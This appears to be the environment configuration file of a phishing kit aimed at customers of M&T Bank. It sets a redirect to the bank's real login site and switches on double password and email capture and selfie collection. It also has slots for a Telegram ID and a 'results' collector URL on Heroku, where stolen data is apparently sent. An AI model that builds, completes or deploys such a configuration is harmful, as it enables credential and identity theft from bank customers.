NEXT_PUBLIC_DOCS_PAGE=ON
NEXT_PUBLIC_EXIT_URL=https://onlinebanking.mtb.com
NEXT_PUBLIC_DOUBLE_LOGIN=ON
NEXT_PUBLIC_DOUBLE_EMAIL_LOGIN=ON
NEXT_PUBLIC_TAKE_SELFIE=ON
TELEGRAM_ID=
RES_LINK=https://rocketresults.herokuapp.com
TO=
KEY=